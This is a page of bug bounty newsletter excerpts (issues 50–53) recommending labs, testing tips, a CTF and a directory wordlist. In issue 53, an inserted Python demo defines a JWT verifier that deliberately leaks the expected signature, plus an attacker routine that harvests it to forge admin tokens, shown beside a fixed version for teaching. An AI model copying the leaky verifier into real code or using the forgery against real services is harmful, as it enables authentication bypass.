The 5 Hacking NewsLetter 53

Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.

This issue covers the week from 3 to 10 of May.

Our favorite 5 hacking items

1. Challenge of the week

Authentication Lab (online), Source code & Walkthroughs

This is a great lab if you want to practice finding authentication vulnerabilities. There are 5 bugs: IP-based authentication bypass, timing attack, client-side auth, leaky JWT, and JWT signature disclosure (CVE-2019-7644).

Also, if stuck, check out the walkthroughs. I don’t want to read them before doing the challenges but they seem detailed (like 5 articles in 1!).
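To make the last item concrete, here is a small self-contained illustration, added here and not code from the lab or the original post. It assumes an HS256 verifier whose failure message echoes the signature it expected (the behaviour the challenge name points at); the secret key, function names and claims are invented. The attacker submits a token with arbitrary claims and a bogus signature, copies the expected signature out of the error, and resubmits. The hardened verifier beside it returns a generic error and uses a constant-time comparison, which also closes the byte-by-byte timing leak of a plain `!=`.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Hypothetical server-side key; the attacker never sees it.
SECRET = b"server-side-secret-the-attacker-never-sees"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign(header_b64: str, payload_b64: str, key: bytes) -> str:
    """HS256 signature over the signing input, base64url-encoded."""
    mac = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return b64url(mac)


def mint(claims: dict, key: bytes = SECRET) -> str:
    """Server-side: issue a properly signed token."""
    header_b64 = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload_b64 = b64url(json.dumps(claims).encode())
    return f"{header_b64}.{payload_b64}.{sign(header_b64, payload_b64, key)}"


def forge_unsigned(claims: dict) -> str:
    """Attacker-side: arbitrary claims with a signature that cannot be right."""
    header_b64 = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload_b64 = b64url(json.dumps(claims).encode())
    return f"{header_b64}.{payload_b64}.{b64url(b'not-the-real-signature')}"


class SignatureError(Exception):
    pass


def verify_leaky(token: str, key: bytes = SECRET) -> dict:
    """Vulnerable verifier: the error message discloses the expected signature,
    and the comparison is not constant-time."""
    header_b64, payload_b64, sig = token.split(".")
    expected = sign(header_b64, payload_b64, key)
    if sig != expected:
        raise SignatureError(f"Invalid signature. Expected {expected} got {sig}")
    return json.loads(b64url_decode(payload_b64))


def verify_safe(token: str, key: bytes = SECRET) -> dict:
    """Hardened verifier: one generic error, constant-time comparison."""
    try:
        header_b64, payload_b64, sig = token.split(".")
    except ValueError:
        raise SignatureError("Invalid token")
    expected = sign(header_b64, payload_b64, key)
    if not hmac.compare_digest(sig.encode(), expected.encode()):
        raise SignatureError("Invalid token")
    return json.loads(b64url_decode(payload_b64))


def exploit_disclosure(verifier, claims: dict) -> Optional[dict]:
    """Attacker: send a forged token, harvest the leaked signature from the
    error, resubmit. Returns the accepted claims, or None if nothing leaked."""
    token = forge_unsigned(claims)
    try:
        verifier(token)
    except SignatureError as e:
        msg = str(e)
        if "Expected " not in msg:
            return None
        leaked = msg.split("Expected ")[1].split(" ")[0]
        header_b64, payload_b64, _ = token.split(".")
        try:
            return verifier(f"{header_b64}.{payload_b64}.{leaked}")
        except SignatureError:
            return None
    return None  # forged token accepted outright: a different bug, not this one


if __name__ == "__main__":
    print("leaky verifier:", exploit_disclosure(verify_leaky, {"sub": "admin"}))
    print("safe verifier: ", exploit_disclosure(verify_safe, {"sub": "admin"}))
```

Note that the leaked value is not the key: the attacker can only obtain signatures for payloads they already submitted, but since they choose the payload, that is enough to become any user. The fix is never to echo computed secrets or MACs in errors, not just to compare in constant time.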

More …

The 5 Hacking NewsLetter 52

Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.

This issue covers the week from 26 of April to 03 of May.

Our favorite 5 hacking items

1. Video of the week

5 super important main-app testing tips for bug bounty hunters with STOK&Haddix

Any video by @stokfredrik & @jhaddix is a must watch! This one has 5 crucial things you want to do as a bug hunter:

  • Don’t limit yourself to the external attack surface. Log in as different users & try to find where the sensitive functionality is => access controls bugs & IDOR
  • Find out how the site references you as a user (& what you’re allowed to do) => IDOR, File upload, RCE
  • Test all parameters => SSRF, LFI, RFI, Path traversal
  • Content discovery => hidden paths, private data leakage => Authentication bypass, logic flaws
  • Find out which business flaws the target cares about (other than technical bugs)

But this is not all. Watch the video. It’s short but packed with information!

More …

The 5 Hacking NewsLetter 51

Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.

This issue covers the week from 19 to 26 of April.

Our favorite 5 hacking items

1. Challenge of the week

CTF Challenge

I haven’t had the time yet to do this CTF, but it’s on my todo list because it seems different. It’s a Web CTF that involves multiple subdomains, directory bruteforce, and different attack vectors.

So it’s a nice opportunity to practice recon. But make sure to respect the rules (attacking the infrastructure/ports other than 443 is not allowed).

More …

The 5 Hacking NewsLetter 50

Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.

This issue covers the week from 12 to 19 of April.

Our favorite 5 hacking items

1. Resource of the week

Content_discovery_nullenc0de.txt

This is a new content discovery wordlist by @nullenc0de, to use for file & directory bruteforce with tools like dirsearch, dirb, etc. It’s based on @JHaddix’s content_discovery_all.txt dictionary but has about 250k more directories/files.

As a comparison, here is the exact number of entries in these two and in dirsearch’s default dictionary:

# wc -l content_discovery_all.txt
373535 content_discovery_all.txt
# wc -l /root/tools/dirsearch/db/dicc.txt
6087 /root/tools/dirsearch/db/dicc.txt
# wc -l content_discovery_nullenc0de.txt
623103 content_discovery_nullenc0de.txt

More …

How to think out of the box with @gwendallecoguic

Hey hackers! This is another AMA on the topic of: How to think out of the box?

If you haven’t checked out the other ones, they’re at https://pentester.land/ama.
And the podcast episode that started this whole series is The Bug Hunter Podcast 4: Bypassing email filters & Thinking out of the box.
While preparing it, I wanted to include advice from different bug hunters. So I asked several hackers these 3 specific questions:

  • How to find bugs that are not duplicates?
  • How to find new areas of research (like in @securinti’s last blog post or what James Kettle does)?
  • How to find logic bugs or bugs that don’t fall under any category, can’t be found with tools or require real thinking?

@gwendallecoguic was one of the awesome hackers who responded. Here is his advice:

More …